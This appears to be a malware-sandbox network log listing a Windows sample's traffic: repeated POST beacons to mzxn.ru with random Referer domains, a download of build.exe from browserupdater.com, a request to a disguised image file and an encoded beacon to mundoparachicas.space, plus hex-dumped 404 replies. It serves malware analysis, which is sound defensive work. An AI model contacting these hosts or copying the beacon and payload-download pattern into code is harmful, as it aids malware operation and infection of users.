      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yclxfxgmqbvjkhy.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 300Host: mzxn.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kiaaagbssjkd.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 204Host: mzxn.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://srhunmufdtubiva.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 248Host: mzxn.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jmoobswoyynvmcc.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 208Host: mzxn.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nepghogipjla.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 261Host: mzxn.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pomgyqmowolnyuhi.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 364Host: mzxn.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uxdwmdslnymyde.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 169Host: mzxn.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://idvimpvmdkks.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 303Host: mzxn.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bekxhhsmaopjub.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 293Host: mzxn.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gjmkiqrlvkslwsem.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 339Host: mzxn.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mgctvlvgdog.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 270Host: mzxn.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://keqkgetrekoo.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 118Host: mzxn.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vqvtaxxtrjbp.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 229Host: mzxn.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ovdrqgaphhsrkg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 348Host: mzxn.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jgwoffhiempfd.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 130Host: mzxn.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://biwmwjkqpuwangh.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 143Host: mzxn.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ydamtofmlce.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 151Host: mzxn.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yyvupavchggrcv.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 227Host: mzxn.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://doftqgthwcaw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 138Host: mzxn.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nddnnutqhypaj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 217Host: mzxn.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nmxuerpvqdsp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 315Host: mzxn.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hmylssppqcui.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 337Host: mzxn.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://viiuigfvqxtv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 152Host: mzxn.ru
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /build.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: browserupdater.com
      Source: global trafficHTTP traffic detected: GET /wp-content/images/pic5.jpg HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: mussangroup.com
      Source: global trafficDNS traffic detected: DNS query: mzxn.ru
      Source: global trafficDNS traffic detected: DNS query: browserupdater.com
      Source: global trafficDNS traffic detected: DNS query: mussangroup.com
      Source: global trafficDNS traffic detected: DNS query: mundoparachicas.space
      Source: unknownHTTP traffic detected: POST /dnbcompany_lt1jns?r8nly8r5hpamvqwa=wPH3ORWQpCff0Rbkjeq7BHUXYUTSjq2ZvEO74fzamCqz4bPud6wNFWcNcvb5H2uEbiUuLc8s9wrJ4LD3%2BwxZ6g%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Content-Length: 96Host: mundoparachicas.space
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 06 Aug 2024 12:48:27 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 04 00 00 00 72 e8 85 e9 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 06 Aug 2024 12:48:29 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 06 Aug 2024 12:48:30 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 06 Aug 2024 12:48:32 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 06 Aug 2024 12:48:33 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 06 Aug 2024 12:48:35 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 06 Aug 2024 12:48:36 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 06 Aug 2024 12:48:41 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 06 Aug 2024 12:48:42 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 06 Aug 2024 12:48:48 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 06 Aug 2024 12:48:49 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 09 78 49 e3 2b 0f e9 ed 57 f7 9f f6 af 30 da 2d da f5 6c 58 00 85 86 8b 80 61 cc 3b Data Ascii: #\6xI+W0-lXa;
